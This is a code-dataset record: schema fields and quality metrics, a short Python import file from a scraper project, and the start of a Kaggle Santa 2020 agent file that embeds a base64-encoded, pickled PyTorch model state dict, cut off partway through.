hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
3bf418ae8f4ecf38c64c377ce151963a68469373
78
py
Python
scrapers/mps_interests/__init__.py
spudmind/spud
86e44bca4efd3cd6358467e1511048698a45edbc
[ "MIT" ]
2
2015-04-11T12:22:41.000Z
2016-08-18T11:12:06.000Z
scrapers/mps_interests/__init__.py
spudmind/spud
86e44bca4efd3cd6358467e1511048698a45edbc
[ "MIT" ]
84
2015-01-22T14:33:49.000Z
2015-04-01T23:15:29.000Z
scrapers/mps_interests/__init__.py
spudmind/spud
86e44bca4efd3cd6358467e1511048698a45edbc
[ "MIT" ]
1
2015-04-16T03:10:39.000Z
2015-04-16T03:10:39.000Z
from fetch_mps_interests import fetch from scrape_mps_interests import scrape
26
39
0.897436
12
78
5.5
0.5
0.363636
0.545455
0
0
0
0
0
0
0
0
0
0.102564
78
2
40
39
0.942857
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
ce1394144f48672bb7970d09584cb37e3539426e
419,212
py
Python
rl_agents/a3c_agent_v4-164_deterministic.py
IsaiahPressman/Kaggle_Santa_2020
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
[ "MIT" ]
null
null
null
rl_agents/a3c_agent_v4-164_deterministic.py
IsaiahPressman/Kaggle_Santa_2020
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
[ "MIT" ]
null
null
null
rl_agents/a3c_agent_v4-164_deterministic.py
IsaiahPressman/Kaggle_Santa_2020
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
[ "MIT" ]
null
null
null
serialized_string = b'gAN9cQBYEAAAAG1vZGVsX3N0YXRlX2RpY3RxAWNjb2xsZWN0aW9ucwpPcmRlcmVkRGljdApxAilScQMoWCEAAABiYXNlLmxheWVycy4wLm1lc3NhZ2VfcGFzc2luZ19tYXRxBGN0b3JjaC5fdXRpbHMKX3JlYnVpbGRfdGVuc29yX3YyCnEFKGN0b3JjaC5zdG9yYWdlCl9sb2FkX2Zyb21fYnl0ZXMKcQZCPJ0AAIACigps/JxG+SBqqFAZLoACTekDLoACfXEAKFgQAAAAcHJvdG9jb2xfdmVyc2lvbnEBTekDWA0AAABsaXR0bGVfZW5kaWFucQKIWAoAAAB0eXBlX3NpemVzcQN9cQQoWAUAAABzaG9ydHEFSwJYAwAAAGludHEGSwRYBAAAAGxvbmdxB0sEdXUugAIoWAcAAABzdG9yYWdlcQBjdG9yY2gKRmxvYXRTdG9yYWdlCnEBWA4AAAA5NDQwNTMyNDU2MDk5MnECWAMAAABjcHVxA00QJ050cQRRLoACXXEAWA4AAAA5NDQwNTMyNDU2MDk5MnEBYS4QJwAAAAAAAAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JT